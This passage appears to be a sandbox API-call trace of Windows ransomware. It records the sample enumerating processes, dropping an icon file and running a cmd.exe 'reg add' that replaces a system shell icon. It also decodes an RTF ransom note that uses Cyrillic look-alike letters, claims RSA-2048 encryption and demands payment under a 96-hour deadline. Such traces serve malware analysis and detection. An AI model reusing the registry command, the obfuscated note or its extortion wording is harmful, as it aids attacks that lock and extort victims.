hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0112.643] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0112.644] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: 
lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.645] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0112.646] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0112.647] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0112.648] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.649] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.650] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.651] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: 
lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.652] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.653] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd2c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bkM66bYk.exe")) returned 1 [0112.654] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.654] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.655] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd5c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bkM66bYk.exe")) returned 1 [0112.656] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd5c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bkM66bYk.exe")) returned 0 [0112.657] CloseHandle (hObject=0xf4) returned 1 [0112.657] FindResourceW 
(hModule=0x400000, lpName="BICO", lpType=0xa) returned 0x51c2e0 [0112.657] LoadResource (hModule=0x400000, hResInfo=0x51c2e0) returned 0x509760 [0112.657] SizeofResource (hModule=0x400000, hResInfo=0x51c2e0) returned 0x3dfb [0112.657] LockResource (hResData=0x509760) returned 0x509760 [0112.658] FreeResource (hResData=0x509760) returned 0 [0112.658] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0112.658] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0112.658] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0112.658] LockResource (hResData=0x50d64c) returned 0x50d64c [0112.658] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361ec0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0112.658] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361ec0, cbMultiByte=38, lpWideCharStr=0x133e14c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0112.658] FreeResource (hResData=0x50d64c) returned 0 [0112.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1361ec4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0112.658] GetCurrentThreadId () returned 0xaf0 [0112.658] GetCurrentThreadId () returned 0xaf0 [0112.658] GetCurrentThreadId () returned 0xaf0 [0112.658] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\7l6OWDI9Fmrsoy1O.ico" (normalized: 
"c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\7l6owdi9fmrsoy1o.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0112.659] WriteFile (in: hFile=0xf4, lpBuffer=0x126c830*, nNumberOfBytesToWrite=0x3dfb, lpNumberOfBytesWritten=0x12fbb8, lpOverlapped=0x0 | out: lpBuffer=0x126c830*, lpNumberOfBytesWritten=0x12fbb8*=0x3dfb, lpOverlapped=0x0) returned 1 [0112.660] CloseHandle (hObject=0xf4) returned 1 [0112.660] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\", lpszShortPath=0x125bfcc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\") returned 0x32 [0112.661] CharUpperBuffW (in: lpsz="reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"", cchLength=0xc8 | out: lpsz="REG ADD \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL ICONS\" /F && REG ADD \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL ICONS\" /V \"29\" /T REG_SZ /F /D \"[ICO_PATH],0\"") returned 0xc8 [0112.661] CharUpperBuffW (in: lpsz="[ICO_PATH]", cchLength=0xa | out: lpsz="[ICO_PATH]") returned 0xa [0112.661] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbac*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, 
lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb9c | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0\"", lpProcessInformation=0x12fb9c*(hProcess=0xf0, hThread=0xf4, dwProcessId=0xd8c, dwThreadId=0xd90)) returned 1 [0112.813] CloseHandle (hObject=0xf0) returned 1 [0112.813] CloseHandle (hObject=0xf4) returned 1 [0112.813] FindResourceW (hModule=0x400000, lpName="RDM", lpType=0xa) returned 0x51c4c0 [0112.813] LoadResource (hModule=0x400000, hResInfo=0x51c4c0) returned 0x516fbc [0112.813] SizeofResource (hModule=0x400000, hResInfo=0x51c4c0) returned 0x15f2 [0112.813] LockResource (hResData=0x516fbc) returned 0x516fbc [0112.813] FreeResource (hResData=0x516fbc) returned 0 [0112.813] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0112.813] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0112.813] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0112.813] LockResource (hResData=0x50d64c) returned 0x50d64c [0112.813] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361ec0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0112.813] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361ec0, cbMultiByte=38, lpWideCharStr=0x133e1ac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0112.813] FreeResource (hResData=0x50d64c) returned 0 [0112.813] WideCharToMultiByte (in: CodePage=0xfde9, 
dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1361ec4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0112.813] GetCurrentThreadId () returned 0xaf0 [0112.813] GetCurrentThreadId () returned 0xaf0 [0112.813] GetCurrentThreadId () returned 0xaf0 [0112.814] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x125bfa8, cbMultiByte=5618, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5618 [0112.814] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x125bfa8, cbMultiByte=5618, lpWideCharStr=0x125f60c, cchWideChar=5618 | out: lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset204 Calibri;}{\\f1\\fnil\\fcharset0 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;}\r\n{\\*\\generator Msftedit 5.41.21.2510;}\\viewkind4\\uc1\\pard\\ri-500\\sa200\\sl240\\slmult1\\tx8804\\b\\f0\\fs28\\'c0\\lang1033\\f1 tt\\lang1049\\f0\\'e5\\lang1033\\f1 nti\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0 ! 
\\'c0\\lang1033\\f1 ll\\lang1049\\f0 \\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur\\lang1049\\f0 \\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 \\lang1033\\f1 w\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'e5 \\'e5\\lang1033\\f1 n\\lang1049\\f0\\'f1\\lang1033\\f1 ry\\lang1049\\f0\\'f0\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d with RS\\lang1049\\f0\\'c0-\\lang1033\\f1 2048 \\lang1049\\f0\\'e0\\lang1033\\f1 lg\\lang1049\\f0\\'ee\\lang1033\\f1 rithm\\lang1049\\f0 .\\par\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\lang1033\\b0\\f1\\fs24 With\\lang1049\\f0\\'ee\\lang1033\\f1 ut \\lang1049\\f0\\'f3\\'ee\\lang1033\\f1 ur p\\lang1049\\f0\\'e5\\lang1033\\f1 rs\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0\\'e0\\lang1033\\f1 l d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 pti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 is imp\\lang1049\\f0\\'ee\\lang1033\\f1 ssibl\\lang1049\\f0\\'e5\\lang1033\\f1 !\\par\r\nT\\lang1049\\f0\\'ee \\lang1033\\f1 g\\lang1049\\f0\\'e5\\lang1033\\f1 t y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 k\\lang1049\\f0\\'e5\\lang1033\\f1 y \\lang1049\\f0\\'e0\\lang1033\\f1 nd d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 t th\\lang1049\\f0\\'e5\\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 , \\lang1033\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\lang1033\\f1 to s\\lang1049\\f0\\'e5\\lang1033\\f1 nd th\\lang1049\\f0\\'e5\\lang1033\\f1 f\\lang1049\\f0\\'ee\\lang1033\\f1 ll\\lang1049\\f0\\'ee\\lang1033\\f1 wing c\\lang1049\\f0\\'ee\\lang1033\\f1 
d\\lang1049\\f0\\'e5:\\par\r\n\\pard\\sa200\\sl240\\slmult1\\lang1033\\b\\f1\\fs28 [KID]\\lang1049\\f0\\fs32\\par\r\n\\lang1033\\b0\\f1\\fs24 t\\lang1049\\f0\\'ee\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 ur \\lang1049\\f0\\'e5\\lang1033\\f1 -m\\lang1049\\f0\\'e0\\lang1033\\f1 il \\lang1049\\f0\\'e0\\lang1033\\f1 ddr\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0 : \\lang1033\\b\\f1\\fs28 [EML1]\\lang1049\\b0\\f0\\fs32\\par\r\n\\lang1033\\f1\\fs24 Th\\lang1049\\f0\\'e5\\lang1033\\f1 n Y\\lang1049\\f0\\'ee\\lang1033\\f1 u will r\\lang1049\\f0\\'e5\\lang1033\\f1 ci\\lang1049\\f0\\'e5\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\'e0\\lang1033\\f1 ll n\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0\\'e0\\lang1033\\f1 ry instru\\lang1049\\f0\\'f1\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 ns\\lang1049\\f0 .\\par\r\n\\cf1\\lang1033\\b\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 nl\\lang1049\\f0\\'f3\\lang1033\\f1 \\lang1049\\f0 96\\lang1033\\f1 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs t\\lang1049\\f0\\'ee\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r y\\lang1049\\f0\\'ee\\lang1033\\f1 ur d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 ! 
\\lang1049\\f0\\'c0\\lang1033\\f1 ft\\lang1049\\f0\\'e5\\lang1033\\f1 r this tim\\lang1049\\f0\\'e5\\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 d\\lang1049\\f0\\'e5\\lang1033\\f1 l\\lang1049\\f0\\'e5\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d \\lang1049\\f0\\'e0\\lang1033\\f1 nd fil\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0 d\\'e5\\'f1r\\'f3\\'f0ti\\'een will b\\'e5c\\'eem\\'e5 im\\'f0\\'eessibl\\'e5\\lang1033\\f1 !\\par\r\nHurr\\lang1049\\f0\\'f3\\lang1033\\f1 u\\lang1049\\f0\\'f0\\lang1033\\f1 ! \\lang1049\\f0\\'c5\\'e0\\'f1\\lang1033\\f1 h 12 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs\\lang1049\\f0 \\lang1033\\f1 th\\lang1049\\f0\\'e5\\lang1033\\f1 p\\lang1049\\f0\\'e0\\'f3\\lang1033\\f1 m\\lang1049\\f0\\'e5\\lang1033\\f1 nt siz\\lang1049\\f0\\'e5\\lang1033\\f1 will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 in\\lang1049\\f0\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'e5\\'e0\\lang1033\\f1 s\\lang1049\\f0\\'e5\\lang1033\\f1 d b\\lang1049\\f0\\'f3\\lang1033\\f1 100$!\\lang1049\\f0\\par\r\n\\cf0\\b0\\'c0ll th\\'e5 \\'e0tt\\'e5mpts \\'eef d\\'e5\\'f1rypti\\'een by y\\'eeurs\\'e5lf will r\\'e5sult \\'eenly in irr\\'e5v\\'ee\\'f1\\'e0ble l\\'eess \\'eef y\\'eeur d\\'e0t\\'e0.\\par\r\nIf y\\'eeu still w\\'e0nt t\\'ee try t\\'ee d\\'e5crypt th\\'e5m by y\\'eeurs\\'e5lf pl\\'e5\\'e0s\\'e5 m\\'e0k\\'e5 \\'e0 b\\'e0ckup \\'e0t first b\\'e5c\\'e0us\\'e5 th\\'e5 d\\'e5\\'f1rypti\\'een will 
b\\'e5c\\'eem\\'e5 imp\\'eessibl\\'e5 in c\\'e0s\\'e5 \\'eef \\'e0ny ch\\'e0ng\\'e5s insid\\'e5 th\\'e5 fil\\'e5s.\\par\r\nIf y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r") returned 5618 [0112.814] CharUpperBuffW (in: lpsz="{\\rtf1\\ansi\\ansicpg1251\\deff0\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset204 Calibri;}{\\f1\\fnil\\fcharset0 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;}\r\n{\\*\\generator Msftedit 5.41.21.2510;}\\viewkind4\\uc1\\pard\\ri-500\\sa200\\sl240\\slmult1\\tx8804\\b\\f0\\fs28\\'c0\\lang1033\\f1 tt\\lang1049\\f0\\'e5\\lang1033\\f1 nti\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0 ! \\'c0\\lang1033\\f1 ll\\lang1049\\f0 \\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur\\lang1049\\f0 \\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 \\lang1033\\f1 w\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'e5 \\'e5\\lang1033\\f1 n\\lang1049\\f0\\'f1\\lang1033\\f1 ry\\lang1049\\f0\\'f0\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d with RS\\lang1049\\f0\\'c0-\\lang1033\\f1 2048 \\lang1049\\f0\\'e0\\lang1033\\f1 lg\\lang1049\\f0\\'ee\\lang1033\\f1 rithm\\lang1049\\f0 .\\par\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\lang1033\\b0\\f1\\fs24 With\\lang1049\\f0\\'ee\\lang1033\\f1 ut \\lang1049\\f0\\'f3\\'ee\\lang1033\\f1 ur p\\lang1049\\f0\\'e5\\lang1033\\f1 rs\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0\\'e0\\lang1033\\f1 l d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 pti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 is imp\\lang1049\\f0\\'ee\\lang1033\\f1 ssibl\\lang1049\\f0\\'e5\\lang1033\\f1 !\\par\r\nT\\lang1049\\f0\\'ee \\lang1033\\f1 g\\lang1049\\f0\\'e5\\lang1033\\f1 t y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 
\\lang1033\\f1 k\\lang1049\\f0\\'e5\\lang1033\\f1 y \\lang1049\\f0\\'e0\\lang1033\\f1 nd d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 t th\\lang1049\\f0\\'e5\\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 , \\lang1033\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\lang1033\\f1 to s\\lang1049\\f0\\'e5\\lang1033\\f1 nd th\\lang1049\\f0\\'e5\\lang1033\\f1 f\\lang1049\\f0\\'ee\\lang1033\\f1 ll\\lang1049\\f0\\'ee\\lang1033\\f1 wing c\\lang1049\\f0\\'ee\\lang1033\\f1 d\\lang1049\\f0\\'e5:\\par\r\n\\pard\\sa200\\sl240\\slmult1\\lang1033\\b\\f1\\fs28 [KID]\\lang1049\\f0\\fs32\\par\r\n\\lang1033\\b0\\f1\\fs24 t\\lang1049\\f0\\'ee\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 ur \\lang1049\\f0\\'e5\\lang1033\\f1 -m\\lang1049\\f0\\'e0\\lang1033\\f1 il \\lang1049\\f0\\'e0\\lang1033\\f1 ddr\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0 : \\lang1033\\b\\f1\\fs28 [EML1]\\lang1049\\b0\\f0\\fs32\\par\r\n\\lang1033\\f1\\fs24 Th\\lang1049\\f0\\'e5\\lang1033\\f1 n Y\\lang1049\\f0\\'ee\\lang1033\\f1 u will r\\lang1049\\f0\\'e5\\lang1033\\f1 ci\\lang1049\\f0\\'e5\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\'e0\\lang1033\\f1 ll n\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0\\'e0\\lang1033\\f1 ry instru\\lang1049\\f0\\'f1\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 ns\\lang1049\\f0 .\\par\r\n\\cf1\\lang1033\\b\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 nl\\lang1049\\f0\\'f3\\lang1033\\f1 \\lang1049\\f0 96\\lang1033\\f1 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs t\\lang1049\\f0\\'ee\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r y\\lang1049\\f0\\'ee\\lang1033\\f1 ur d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 ! 
